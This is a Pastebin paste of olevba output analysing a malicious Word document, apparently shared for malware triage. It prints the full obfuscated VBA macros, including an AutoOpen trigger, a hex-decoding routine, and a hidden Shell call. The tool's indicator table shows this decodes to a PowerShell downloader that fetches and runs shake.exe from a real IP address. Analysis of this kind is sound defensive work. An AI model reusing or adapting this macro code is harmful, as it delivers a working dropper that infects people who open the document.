Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- XML:MASIH-- 11idj325.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 11idj325.doc
- Type: Word2003_XML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- ÐÎïøÏÃØÀÏÃØâûà
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ûâàûÀÀâûà.bas
- in file: editdata.mso - OLE stream: u'VBA/\u044b\u0432\u0430\u044b\u0410\u0410\u0432\u044b\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Dim AxygGoRiTOkuqRQaIahCglVBhig86 As Integer
- Dim FWdUfyGGTWdgWNsQRofoGrsRaht53 As String
- Dim wpimAVKbJvgEKauDoRaItiZPmpJ71 As Boolean
- Dim krptyASMRGdXptpQpfAbOADHKLl37 As Double
- Dim mcxcyBVDWKBtCDxcMehDZOMLHdw35 As Byte
- Dim DfANDuTzoOLJgtnkAorYuhycBLh99 As Long
- Dim MYRulblLodGLYHRflePvqhJHhaa46 As Currency
- Dim YOjzcfRRuAoNTijUYngLCKOHXOo29 As Single
- Dim UsSXXrkKuQMefbwdYSCyKWoczNp12 As Integer
- Dim oawaFertGZiAGCtnnawpJqRYMpw65 As String
- Dim GcUASXZrTtVjZkjjRlCwPuQquYy45 As Boolean
- Dim ehWjDoUlowIphYRzymKOrWknVvk71 As Double
- Dim tHbwbUfnrcpLLIiZhowOAWgzGlk97 As Byte
- Dim GRGeZctPigHtTqvocYRVXWWHkiW63 As Long
- Dim WtoXLJgHDJAIFgKMFvBREDxYnKE49 As Currency
- Dim PPVTHAdPXpZsgnUWZedQTSJqZLL25 As Single
- Dim qkbMHYZqOLIZHdmyojeOVPXlxXw86 As Integer
- Dim kbRlINXrSUDZYsvpZoIJfjEhIeL41 As String
- Dim OICjFilTZsfJkIKPufsipoOFGdB36 As Boolean
- Dim gccpseUHWEPovokuiUEJlhPsNdL63 As Double
- Dim aQoQtHfbJUXkNdelKuoWMsTUQWg28 As Byte
- Dim jKLDiaSjgwltBjDHbovgTZcoYYr86 As Long
- Dim itmeYPMBWNFuycgqjDXBhjVMOro92 As Currency
- Dim EeRuEFbncgUdMsbrRWhpIYTdezO45 As Single
- Public Function ÈÎèîðÌÎËûâ(ByVal PDZOFTeMMzmMjw As String) As String
- Dim YkhbmjHCwjGfDADLJCDjxAzOCAK34, IiJADFAaDZrNiUgiPfKlZRRjwVS68 As Integer
- IiJADFAaDZrNiUgiPfKlZRRjwVS68 = 2164
- For YkhbmjHCwjGfDADLJCDjxAzOCAK34 = 0 To 35
- IiJADFAaDZrNiUgiPfKlZRRjwVS68 = IiJADFAaDZrNiUgiPfKlZRRjwVS68 + YkhbmjHCwjGfDADLJCDjxAzOCAK34
- DoEvents
- Next YkhbmjHCwjGfDADLJCDjxAzOCAK34
- Dim hYlCzZmShpxesNYFktdcasEAVty15, wxOFaXIGlXMIqoVdjbqthiQvFjI13 As Integer
- wxOFaXIGlXMIqoVdjbqthiQvFjI13 = 5447
- For hYlCzZmShpxesNYFktdcasEAVty15 = 0 To 36
- wxOFaXIGlXMIqoVdjbqthiQvFjI13 = wxOFaXIGlXMIqoVdjbqthiQvFjI13 + hYlCzZmShpxesNYFktdcasEAVty15
- DoEvents
- Next hYlCzZmShpxesNYFktdcasEAVty15
- Dim KIeMXoAYAtGBqiQgALSWLvhkjVw15, lZShIiVKOjBvaVmcUOQjDcfqSOf83 As Integer
- lZShIiVKOjBvaVmcUOQjDcfqSOf83 = 7486
- For KIeMXoAYAtGBqiQgALSWLvhkjVw15 = 0 To 17
- lZShIiVKOjBvaVmcUOQjDcfqSOf83 = lZShIiVKOjBvaVmcUOQjDcfqSOf83 + KIeMXoAYAtGBqiQgALSWLvhkjVw15
- DoEvents
- Next KIeMXoAYAtGBqiQgALSWLvhkjVw15
- For GBfuNiAvl = 1 To Len(PDZOFTeMMzmMjw) Step 2
- rIvzZMKEQTqM = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(PDZOFTeMMzmMjw, GBfuNiAvl, 2)))
- rnyBQmn = rnyBQmn & rIvzZMKEQTqM
- Next GBfuNiAvl
- ÈÎèîðÌÎËûâ = rnyBQmn
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO êóåÀàïûâà.bas
- in file: editdata.mso - OLE stream: u'VBA/\u043a\u0443\u0435\u0410\u0430\u043f\u044b\u0432\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ÐÎïøÏÃØÀÏÃØâûà()
- øÈÐîìðîûâàÀ = ÈÎèîðÌÎËûâ(StrReverse("B3568756E2643746834783947455965786C55205D454455202472716473702B3568756E2643746834783947455965786C55205D454455202261636E2643746834783947455965786C55205D45445520246E61607875602B39272261636E2643746834783947455965786C55205D454455272C272568756E256B6168637F297A7F6F6D637F2434323E28323E21333E2637313F2F2A307474786728256C696644616F6C6E677F644E29247E65696C634265675E24756E4E2D6564737973502473656A626F4D27756E4820256C69666F62707F6E6D20237371607972602973696C6F605E6F696475736568754D202568756E2C6C6568637275677F60702B4F20246D636"))
- ãíÃÏÎûâàà = Shell(øÈÐîìðîûâàÀ, 0)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | IOC | http://176.31.28.244 | URL (obfuscation: StrReverse+Hex) |
- | | /smoozy/shake.exe',' | |
- | | %TEMP%\huiUGI8t8dsF. | |
- | | cab' | |
- | IOC | 176.31.28.244 | IPv4 address (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | powershell.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | shake.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | huiUGI8t8dsF.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement